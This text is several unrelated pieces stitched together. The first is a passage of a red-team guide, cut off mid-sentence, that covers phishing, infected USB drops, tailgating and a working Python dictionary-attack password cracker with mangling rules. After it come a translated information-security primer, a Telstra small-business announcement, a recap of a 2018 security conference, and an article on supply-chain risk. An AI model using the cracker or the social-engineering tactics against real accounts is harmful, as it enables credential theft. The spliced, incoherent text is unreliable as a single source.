Implementation errors are programming flaws in security software or any exposed services. These flaws are publicly announced once patches are available, but not all organizations apply patches promptly. The service detection and banner grabbing phase of target identification is invaluable for this since it allows identification of potentially vulnerable software without being as detectable as a full vulnerability scan. By cross-checking versions against a list of CVEs, the red team may find an unpatched vulnerability that would allow access to the system.

Bypassing Digital Defenses

The other main option for defeating digital defenses is bypassing them by becoming one of the “right people” in the eyes of the security software. Since most organizations use passwords as their means of authentication to systems, this typically means stealing a user’s password. This is a commonly-used tactic for hackers, with stolen credentials being used in 40% of incidents. Password theft can be accomplished in a variety of ways.

If the red team has the ability to sniff network traffic (usually by connecting to the company Wi-Fi), then password cracking is a good option. Many protocols send hashed passwords over the network, and some even send them unhashed. If a red team can capture password hashes, cracking them with a tool like John the Ripper is a good option.
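The mechanics behind "cracking them with a tool like John the Ripper", as an added example in Python (not code from the original article and not John itself): a rule-based dictionary attack against a handful of constructed, unsalted SHA-1 hashes. The usernames, the hashes and the wordlist are all made up for the demo; a real engagement would use captured hashes and a leaked-password wordlist.

```python
import hashlib
from typing import Dict, Iterable, Iterator

# Constructed targets: SHA-1 hashes generated here from the passwords the cracker should recover.
# 'dave' uses a passphrase no rule produces from the wordlist, so it stays uncracked.
CAPTURED_HASHES = {
    "alice": hashlib.sha1(b"Welcome2018").hexdigest(),
    "bob":   hashlib.sha1(b"password1").hexdigest(),
    "carol": hashlib.sha1(b"Summer!").hexdigest(),
    "dave":  hashlib.sha1(b"correct horse battery").hexdigest(),
}

# Constructed wordlist; real cracking runs use lists with millions of entries
WORDLIST = ["welcome", "password", "summer", "uber", "letmein"]


def mangle(word: str) -> Iterator[str]:
    """Yield candidates from one base word using John-style rules:
    case variants, then an appended digit, symbol or recent year."""
    seen = set()
    bases = (word, word.capitalize(), word.upper())
    suffixes = [""] + [str(d) for d in range(10)] + ["!", "123", "2017", "2018", "2019"]
    for b in bases:
        for s in suffixes:
            cand = b + s
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack(hashes: Dict[str, str], wordlist: Iterable[str], algo: str = "sha1") -> Dict[str, str]:
    """Dictionary attack. Every candidate is hashed once and looked up against all targets,
    which is why a batch of unsalted hashes costs no more to crack than a single one."""
    by_hash: Dict[str, list] = {}
    for user, h in hashes.items():
        by_hash.setdefault(h.lower(), []).append(user)
    found: Dict[str, str] = {}
    for word in wordlist:
        for cand in mangle(word):
            digest = hashlib.new(algo, cand.encode("utf-8")).hexdigest()
            for user in by_hash.get(digest, []):
                found[user] = cand
        if len(found) == len(hashes):
            break
    return found


if __name__ == "__main__":
    for user, password in crack(CAPTURED_HASHES, WORDLIST).items():
        print("%s: %s" % (user, password))
```

The reverse-lookup table is the design point: with unsalted hashes the attacker pays one hash computation per candidate regardless of how many accounts were captured, which is the argument for per-user salts and slow hashes (bcrypt, scrypt, Argon2) on the defending side.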

Gaining access is another use case where social engineering shines. Phishing emails that pretend to be from a trusted brand are a great way to get credentials. A recent poll has found that 75% of the respondents reuse passwords across personal and business accounts, meaning that phished credentials are likely to help in an attack. Phone-based phishing attacks, such as those pretending to be from the IT help desk, are another great way to get passwords. Social engineering can also be carried out physically (e.g., dropping infected USB drives in the company parking lot). If social engineering is within the scope of the assessment and can make the initial stage of gaining access easier, it should be used.

Physical Defenses

Many aspiring red team testers focus too much on the digital side of hacking and not enough on the physical. The main advantages of digital hacking are that it can be performed from anywhere and it’s more anonymous. However, physical attacks can achieve the same goals with much less effort by the red team if performed correctly.

Physical defenses can be either defeated or bypassed as well. Examples of defeating physical defenses include climbing over fences, picking locks or climbing through vents like your favorite action hero.

Bypassing physical defenses typically involves social engineering. Say you want to get through a locked door into the building. You could try to pick the lock, but odds are that you’ll be quickly caught and arrested. However, if you walk up to the door carrying a heavy box right after someone else, odds are they’ll hold it for you without a second thought.

By using a pretext that doesn’t set off someone’s mental defenses, a red team member can achieve their objective and slip through defenses much more easily. And physical access to the target often presents opportunities for a much more comprehensive and less detectable compromise of the target network.

Setting the Stage

The goal of this stage is gaining initial access to the target organization. A successful phase results in the red team having some level of access to a machine inside the target organization. Depending on the method of attack, the level of access may vary, but a

"Hacker" Beginner Study: A Brief Overview of Information Security

Information security is a major issue bearing on national security and sovereignty, social stability, and the inheritance and development of national culture, and its importance grows as global informatization accelerates. Information networks touch government, military, culture, education and many other fields. Much of the information they store, transmit and process consists of government macro-control decisions, business and economic data, bank fund transfers, stocks and securities, energy and resource data, scientific research data and other important information, a great deal of which is sensitive and some of which is state secret. Although computer networks have brought people enormous convenience, the Internet is an open system facing the general public; confidentiality of information and security of systems were not fully considered in its design, hidden security risks exist, and the network security situation grows more serious by the day. With information crime increasing year by year, effectively ensuring information security has become a focus of public attention.

1. Introduction to Information Security

The concept of information security is relatively broad. After reading a large body of Chinese and foreign literature, it can be summarized as follows:

Information security means that the software and hardware in network information resources, and the various data running in information systems, are protected so that they are not tampered with, destroyed or leaked by passive or active attacks, ensuring that information systems run securely, stably and reliably and that information services remain continuously available over the long term. The scope of information security mainly covers five areas: security against unauthorized copying of information, confidentiality, integrity, authenticity, and the security of the host system. The ultimate goal of information security is to use every security measure to protect information so that it is not damaged, which is why information needs to be encrypted. To ensure the security of information resources, access to information on the network must be controlled, information sources must be verified, and it must be ensured that no illegal software resides in the system. Information security is a highly interdisciplinary field, drawing on computer science, communications technology, cryptography, probability theory, information security technology, networking technology, mathematics, information theory and more; it is a comprehensive discipline with demanding requirements.

2. Attributes of Information Security

Information security refers to the external state and manner, and the internal subjective sense, in which the information space, information carriers and information resources of states, institutions and individuals are kept free from dangers, threats, infringement and misdirection of every form, whether internal or external. The development of information technology keeps extending the meaning of information security. It can be understood as the ability of an information system to withstand accidental events or malicious actions that would endanger the confidentiality, integrity, availability, non-repudiation, authenticity and controllability of the data it stores, processes or transmits, or of the services those systems provide. These six properties are the basic attributes of information security.

Confidentiality: information is not interpreted by unauthorized parties and the information system is not used without authorization. Data cannot be interpreted even if it is captured, and a party that can access the system still cannot exceed its privileges to reach information inconsistent with its identity.

Integrity: information is not tampered with. Information transmitted over the network is not altered, or any alteration that does occur can be detected.

Availability: information and information systems can be used under any circumstances, provided basic requirements are met. This property lives at the physical-security and operational-security layers. It ensures that basic information networks and important information systems keep operating normally, including normal delivery of information and normal provision of services.

Non-repudiation: an operator of an information system or a handler of information cannot deny their actions or the results of their processing. This prevents a party to an operation or communication from later denying that the event took place.

Authenticity: during interactive operation, the information system ensures and confirms the source of information and the genuineness, trustworthiness and non-repudiability of its publisher, so that the identities of both parties and the exchanged information and its origin are genuine and trustworthy.

Controllability: the information system can monitor and control information flows, including the ability to actively monitor, filter, restrict and block specific information and information flows on the Internet.

3. Threats to Information Security

Security problems exist only because threats exist; information security protection consists of countermeasures devised against threats. Information security threats are a product of society reaching a certain stage of development. Their root cause is the selfish desire of lawbreakers, along with other direct and indirect causes.


The threats to information security can be summarized as follows:

(1) Threats from origin

Almost all CPUs, operating systems, peripherals, network systems and even some encryption and decryption tools come from abroad. This is equivalent to having one's secrets held in someone else's hands, and it is impossible not to be at their mercy.

(2) Transmission channel threats

Information must be transmitted over wired or wireless channels. In transit it may be eavesdropped on, tampered with or forged; the security of the information is threatened and the rights of legitimate users are infringed. Transmission also passes through tangible and intangible media, and external environmental factors can attenuate, distort or lose the signal, severely damaging what is transmitted.

(3) Equipment failure threats

Equipment failures interrupt communication. An information system contains a great many hardware devices, so the failure rate is correspondingly high.

(4) System personnel threats

These show mainly in two respects: (1) software developers leave residual defects in the software they develop, and these deeply buried errors often lead to irreparable losses; (2) the professional competence and personal integrity of network administrators and operations staff affect network security. Network administrators have the most direct contact with network secrets; they have the opportunity to steal users' passwords and other confidential material, and their actions may damage the integrity of the network, making them the most direct threat to information security.

(5) Environmental threats

The lag in information security legislation gives hackers openings for criminal activity, and because national interests differ, countries do not cooperate closely enough in jointly combating international hacker crime. Information security technology itself still has many immature aspects, and these are frequently exploited by lawbreakers.

(6) Virus threats

Computer viruses have become a serious hazard. Recently, more and more viruses spread over the network, and the harm they cause keeps growing. Anti-virus software necessarily lags behind the threat and cannot prevent problems before they occur.

4. Classification of Information Security at the Technical Level

At the technical level, information security can be divided into four categories: physical security, operational security, data security and content security. These different aspects objectively reflect different security attributes of technical systems and also determine the different forms that information security technology takes.

(1) Physical security

Physical security concerns the physical equipment of networks and information systems and the information related to it. It mainly involves electromagnetic emissions from information and information systems and resistance to harsh operating environments. The threats faced are mainly natural disasters, electromagnetic leakage and communication interference. The main protective measures are data and system backup, electromagnetic shielding, interference resistance and fault tolerance.

(2) Operational security

Operational security concerns the running process and running state of networks and information systems. It mainly involves the normal operation of information systems and effective access control. The threats faced include network attacks, network viruses, network congestion and exploitation of system vulnerabilities. The main protective measures are access control, virus prevention, emergency response, risk analysis, vulnerability scanning, intrusion detection, system hardening and security auditing.

(3) Data security

Data security concerns the generation, processing, transmission and storage of data (information). It mainly involves the leakage, destruction, forgery and repudiation of data. The threats faced include theft, tampering, impersonation, repudiation, decryption and unauthorized access. The main protective measures are encryption, authentication, access control, identification and signatures.

(4) Content security

Content security concerns the spread of unauthorized information over the network. It mainly involves effective control of disseminated information. The threats faced include the rapid spread of harmful information over the network and the manufacturing of malicious public opinion. The main protective measures are monitoring and filtering of information content.

5. What Means Are Used to Ensure Information Security?

Information security can be ensured by two kinds of means: management and technical.

Management means: establish an information security management system and designate information security management personnel.

Technical means: (shown in a figure in the original article)

6. Basic Classification of Information Security Products

(1) The US information security product standard divides products into 9 categories:

Authentication; access control; intrusion detection; firewall; public key infrastructure; malicious code protection; vulnerability scanning; forensics; media sanitization or erasure.

(2) The standard of China's Ministry of Public Security divides them into 7 categories:

Operating system security; database security; network security; virus protection; access control; encryption; authentication.

(3) China's basic classification standard divides them into 6 categories:

Physical security products; platform security products; network security products; data security products; user security products; management security products.

By security vendors' product classification, they can be divided into: physical security, network security, host security, application security, security management, mobile and virtualization security, and industrial control security.

Telstra launches revamp of services for small business


Telstra has unveiled a major revamp of its support for Australian small businesses, including a new mobile and tablet plan with no lock-in contract and no excess data charges in Australia.

Australia’s largest telco announced on Wednesday it has also launched a new 24/7 tech support service and thousands more dedicated small business specialists across the country.

Telstra positions these latest announcements as the next stage in the rollout of its T22 strategy, which it says has already delivered simpler products by removing domestic excess data charges on consumer mobile plans and provided more choice for customers creating a home or mobile package.

The revamp was announced at an Illawarra Business Chamber Forum in Wollongong on Wednesday by Telstra CEO Andrew Penn who said the T22 milestone for small business was “perfectly timed as many more businesses look to technology to drive productivity, access new markets and improve customer experience”.

“Our new approach for small business is built around three things: flexibility to enable businesses to scale and choose what is right for them, greater cost certainty and value, and expert service and advice, all critical elements for success in today’s fast-paced business environment.

“We know every small business is different; our job is to make sure we have leading solutions and services that are fit for purpose, and what we’ve announced today does that,” Penn said.

Telstra’s new suite of solutions and services for small business includes:

Business Choice mobile plan: small business customers can now get a new mobile or tablet plan with a no lock-in contract and no excess data charges in Australia.

Unlimited data as standard on Business Bundle plans starting from $100.

Telstra Platinum for Business: a new 24/7 tech advice and support service for business owners, to take the pressure off having to employ, or in most cases be, their own IT experts.

More dedicated service and support for small businesses: Telstra has tripled the number of small business specialists in its 350 retail stores around the country to 3,000. In early 2019, Telstra will launch a new national premium ICT channel for small business customers with more complex technology needs.

Telstra has also introduced a Concierge Tech Support service that provides small business customers calling with an NBN or fixed line service issue with one dedicated expert to help solve their problem fast.

Penn said the new solutions were about ensuring Telstra was not only providing advanced technology solutions to small businesses, but also the essential support to go with it.

“This is a significant increase to the level of dedicated service and support we provide small businesses, to help take away complexity and give them peace of mind with their technology usage and support,” Penn said.

Telstra confirmed the next key milestone under its T22 strategy would be the introduction of a new “market leading” loyalty program in March 2019.


Year-End Party of the Security Community: A Full Recap of Day One of FIT 2019

Nearly half a year of careful preparation went into living up to everyone's expectations. If what we did last year was not good enough, then this year FIT 2019, from the opening, the quality of the talks and the Hack Demo sessions to the fun installations and vendor booths outside the hall, will surely give everyone a satisfying answer.

For the network security industry, the annual FIT conference is a year-end review and outlook, a chance to discuss the future direction of network security and the responses to it with leading figures in the industry. For countless white hats and geeks, FIT 2019 is also this year's most anticipated year-end party. For this, CodeSec has carefully prepared a large number of high-quality talks, along with plenty of entertainment, to provide a pleasant platform for exchange and learning for all the friends and vendors who came to support us.

On December 12, 2018, the first day's agenda of FIT 2019 concluded smoothly. Inside and outside the venue there were many wonderful moments that let us fully feel the charm of the network security enthusiast community and further closed the distance between users and CodeSec. Now follow the editor's perspective for a look back at the highlights of day one of FIT 2019.

Did everyone enjoy the opening rap? It proved that elements of the security community can blend perfectly with pop culture and strike some different sparks.

As the organizer of FIT 2019, Tophant (斗象科技) founder and CEO Xie Chen (THANKS) delivered the opening speech, titled "Intelligence Leading the Upgrade of Security Services". Faced with such a grand occasion, Xie Chen could not help feeling moved. Since its birth in 2010, CodeSec has become the first open network security community in China and grown to its current scale, which would have been impossible without all of CodeSec's supporters.

Tophant co-founder and CEO Xie Chen

Xie Chen also described how the network security landscape has changed over the past few years and said the security services market will keep growing, which is fairly consistent with the conclusions of Gartner's industry report. He said that innovative thinking, models and technology, together with commercialization, are the three elements that will drive the industry forward.

This FIT 2019 conference also received strong support and guidance from state bodies including the Office of the Shanghai Municipal Committee Leading Group for Cyberspace Affairs, the National Information Technology Security Research Center, the National Computer Network Emergency Response Technical Team/Coordination Center (CNCERT), and the China Information Technology Security Evaluation Center.

Global Summit

As the heavyweight session of each year's FIT conference, the Global Summit focuses on the macro strategy and thinking behind the security industry's development. This year several executives of well-known domestic and foreign companies were invited to share their views.

Kevin Skahill, Senior Director of Global Product Management at Cisco

Kevin Skahill, Senior Director of Global Product Management at Cisco, opened with a keynote titled "Intent-Based Automated Secure Network Architecture in the Digital Era". New challenges and opportunities bring new business requirements, and as one of the world's largest Internet business suppliers, Cisco proposed new thinking in the face of the new Internet landscape. Skahill spoke about the concept of zero trust architecture, which Cisco believes will become one of the popular frameworks for future network security architecture. Zero trust has become one of the hottest industry keywords of 2018; intent-based networking can accelerate the trusted access process and better combine Internet business with security concepts.

Dean J. Coclin, Vice President of Global Product and Standards at Digicert

The Internet of Everything has become one of the mainstream trends of Internet development, and the security problems it brings have received wide attention. Dean J. Coclin, Digicert's Vice President of Global Product and Standards, spoke on "Exploring Security Threats in IoT Systems". When in Rome, do as the Romans do: Coclin also gave himself a very authentic Chinese name, "丁考林". As Coclin said, the IoT has changed people's lives enormously and greatly increased convenience. At the same time, with attacks on cars, intrusions into medical devices, hacked toys and other security incidents beyond the traditional Internet, the development of the IoT has run into its biggest hurdle, which is security. Coclin believes that avoiding direct Internet connections, changing default login credentials, updating firmware and checking default settings are the basic elements that can effectively mitigate IoT security risk.

Shen Pengfei, Deputy General Manager of Baidu's Security Business Unit

Baidu, which is "All in AI", has achieved a great deal in artificial intelligence. Shen Pengfei, Deputy General Manager of Baidu's Security Business Unit, explained Baidu's understanding of AI under the theme "With AI, More Secure". From PC to mobile to AI, Baidu is moving from thinking to practice to empower the whole AI industry. From the human brain to the computer, from the network to AI, how to improve the security of devices is the key question of the AI era.

The last speaker of this session drew the attention of the whole hall. From Singapore, he introduced himself in not-quite-standard Chinese and gave his talk entirely in English, with a Chinese word or two popping out now and then, leaving people puzzled but also making it more entertaining. He was Anthony Lim, Chief Consultant for Fortinet Asia-Pacific.

Anthony Lim, Chief Consultant, Fortinet Asia-Pacific

Anthony Lim shared practical experience with the Fortinet Security Fabric architecture. He said the changes brought by digital transformation are too rapid to keep up with. The Fortinet Security Fabric has three characteristics, seamless, collaborative and intelligent, enabling security visibility and interaction among multiple security technologies, while automatically responding to security events and continuously performing security assessment.

Hack Demo

Hack Demo is the most popular session of each year's FIT conference, where the audience can witness hackers' cracking process live.

Mosaic censoring has long been seen as a step blocking human progress, yet in the hands of GeekPwn (极棒) Hall of Fame contestant Du Angang it is as good as nonexistent. Using a GAN model, he can remove the mosaic from a bikini photo within seconds and achieve a near-perfect restoration.

GeekPwn Hall of Fame contestant Du Angang

When asked the purpose of doing this, Du Angang left only one sentence: "I want machines to have imagination too."

Yang Yunfei of the 360 Tianma security team and his "goddess"

Even more exciting was the second Hack Demo. Yang Yunfei of the 360 Tianma (天马) security team, to please his "girlfriend", used hacking techniques to remotely control all the glow sticks in the hall and turn them the goddess's favorite color. In the end he received a "nice guy" card; can the hackers watching give this "wounded" hacker some advice on winning back the goddess's heart?

X-TECH Tech Party

At this sharing session that truly belongs to geeks, you will see remarkable security researchers and their "black technology" achievements, and experience the charm of top vulnerability hunters in person.

Pranav Hivarekar, top global vulnerability hunter and founder of PeritusInfoSec

In the earlier talk preview, Pranav Hivarekar from India attracted a lot of attention. He is both a top global vulnerability hunter and the founder of PeritusInfoSec. Finding a bug worth 15,000 US dollars with three lines of code earned the admiration of many expert bug hunters. He described in detail his experience as a vulnerability hunter and his hunting techniques. Understated, yet with a hint of pride between the lines; one cannot help sighing that bug hunters earn money so easily and look so cool doing it that even I want to go and learn the craft.

Zhou Jingping, CSO of Knownsec and Director of the 404 Lab

Another industry heavyweight whom most people already know well is Zhou Jingping, CSO of Knownsec (知道创宇) and Director of its 404 Lab, known as "Black Brother" (黑哥). Listening to him talk about security means understanding vulnerability discovery in cyberspace from a different angle and learning new techniques.

Zhou believes that vulnerability discovery in cyberspace is more about finding "blue oceans", and the key is to find and recognize them; in contrast there is the security "red ocean", the fiercely contested areas where one works intensively. (Er... let me go home and digest this passage properly.)

Orcun Tezel, Senior Director of Systems Engineering, Palo Alto Networks Asia-Pacific

Another heavyweight guest took the stage: Orcun Tezel, Senior Director of Systems Engineering for Palo Alto Networks Asia-Pacific, presented "Rapidly Capturing Attacks with Cloud Sandboxes and Machine Learning". Network threats are increasingly serious, attack methods keep evolving, and the online world is in danger at every moment. Tezel shared three approaches to defending against and locating network attacks:

1. Detecting attacks based on rich network, endpoint and cloud data
2. Rapid investigation through an automated endpoint inspection mechanism
3. Taking action by disabling devices

Zhang Tianqi, Tophant co-founder and CTO

Taking the FIT stage for the fourth time, famous vulnerability hunter and Tophant co-founder and CTO Zhang Tianqi presented "Modern Application Security Offense and Defense Seen Through Bug Bounties". Over the past year his results have been abundant: London, Las Vegas, Sydney, his footprints all over the world, leaving the mark of Chinese hackers at security conferences of every kind. With a few simple examples he let the audience feel the fun of bug bounties and the strength of top vulnerability hunters.

WIT Awards 2018 Ceremony

As the security community's closely watched awards ceremony, the WitAwards 2018 Internet Security Annual Selection was held alongside FIT 2019, aiming to discover outstanding industry cases, set annual benchmarks, and applaud the efforts and innovation of tens of thousands of practitioners and hundreds of security products. Which companies, teams or individuals will take home awards this year? This year's WIT Awards 2018 will produce 8 awards in total, six of which were revealed on the first day:

National Strength of the Year: 360

Security Team of the Year: Aspartame Offense and Defense Lab of 无糖信息 (Wutang Information)

Brand Influence of the Year: Knownsec Cloud Security Defense Platform

Technological Change of the Year: Baidu Security OpenRASP

Innovative Product of the Year: Tencent Cloud 数盾 (Data Shield) and 云镜 (Cloud Mirror), and ThreatHunter (威胁猎人) TH-Karma Business Intelligence Monitoring Platform

Popular Product and Service of the Year: HanSight (瀚思科技) Big Data Security Platform, Rising (瑞星) Enterprise Endpoint Security Management System Software

Highlights Outside the Hall

On the first day of FIT 2019, besides the great content in the main hall, quite a few attendees got hooked on the game area outside, and there were even more nicely dressed-up young ladies to chat with; if I didn't have to write this article, I would have gone to get "hooked" too.

Did the light sign at the check-in entrance catch your eye? I thought it was pretty cool anyway!

As expected, the Lego puzzle area became the most popular spot, attracting many young men and women to join in. Vendor representatives pieced together their own logos, gamers built the shape of a Switch, and there were CodeSec die-hard fans too; look carefully and see how many "confession" puzzles you can find on the wall.

Did the team of carefully dressed-up young ladies win you over? If any caught your eye, tell me and I'll set up a date for you~

This young lady seems to have taken on the "little dinosaur"...

Not only the guys got absorbed in the game area; even the pretty young lady in a kimono was drawn over.

Finally, a few nice photos of the young ladies to close. The first day of FIT 2019 has come to a successful end; did everyone get their fill? If not, there is more tomorrow~ For friends who have not yet made it to the venue, tomorrow is the last chance, with even more great content that will surely make the trip worthwhile.

Supply Chain Security: Managing a Complex Risk Profile


Experts sound off on how companies can work with their third-party suppliers and partners to secure the end-to-end supply chain.

NYC ― From Delta Airlines to Best Buy, a number of big-name companies were involved this year in data breaches, but even though their names made headlines, the actual security incidents occurred due to flaws in third-party partners.

Across the board, companies are scratching their heads trying to determine the best methods to manage their supply chain, including hardware, software and beyond, in order to maintain end-to-end security. But it’s not an easy task.

Ultimately, “There needs to be a shift in conversation,” Emily Heath, chief information security officer at United Airlines, said at the WSJ Cyber Executive Forum on Tuesday. “We’re responsible for patching our own computers but we also work with hardware and software suppliers… and we’re the ones in the headlines even when the vulnerabilities come from the third parties. I spend a ton of time worrying about their products.”

Supply chain attacks are particularly insidious for several reasons. First, they provide a lucrative opportunity for hackers to exploit a vulnerability and hit several companies at once and rack up more customers’ data. Second, with the widening net of the tech ecosystem and more partnerships being formed, it’s difficult to pinpoint and prevent them.

In fact, a recent survey by CrowdStrike found that two-thirds of firms surveyed experienced a software supply-chain attack in the past 12 months.

Even if companies have strategies in place for securing the supply chain, they might not work.

CrowdStrike’s survey revealed that 87 percent of those that suffered a software supply-chain attack had either a full strategy in place, or some level of response pre-planned at the time of their attack ― which proved ineffective.

Worse, on average, respondents from nearly all of the countries surveyed took close to 63 hours to detect and remediate an attack.

How can companies start to secure their supply chain and coordinate with their third-party partners? The first step, said Heath, is understanding those parties: who they are and what they bring to the partnership. “Step one is understanding…what they do for you, who goes to accounts payable, and so on,” she said.

Securing the Supply Chain

Edna Conway, chief security officer of Global Value Chain at Cisco, has found success in taking a “layered approach” to securing the supply chain.

Conway has built an architecture incubated inside the supply chain and manufacturing that she says covers 11 domains including identity management, access control and behavioral security.

“We need to take a comprehensive view of who is providing what. We need to understand and map that, and write requirements for third parties that aren’t prescriptive but goal-based,” she said. “What processes and tools are a shared concern? We need to understand the businesses of our third parties so we can blend that.”

Another aspect of securing supply chains is dealing with the scale, as some companies might have thousands of technology partners.

For Rob Joyce, senior advisor of cybersecurity strategy for the National Security Agency (NSA), supply chain is hierarchical.

“When you think of securing the supply chain, you need to work down the pyramid for who you choose to secure your business,” he said. “People need to think about supply-chain partners with a high threat model.”

Heath agreed. United Airlines and others are facing an increasingly complex ecosystem. United needs to juggle tens of thousands of partners and suppliers that the airline does business with: third parties who might be connected to its network, have access to the network, or do some sort of business with it.

“You need tiering, you need levels, because you can’t secure them all,” she said.

The good news, said Conway, is that high-profile breaches like Ticketmaster and Kmart have “woken up” the world.

“We’re seeing more architectures being developed that allow us to act on threats that can cause manipulation or disruption,” said Conway.
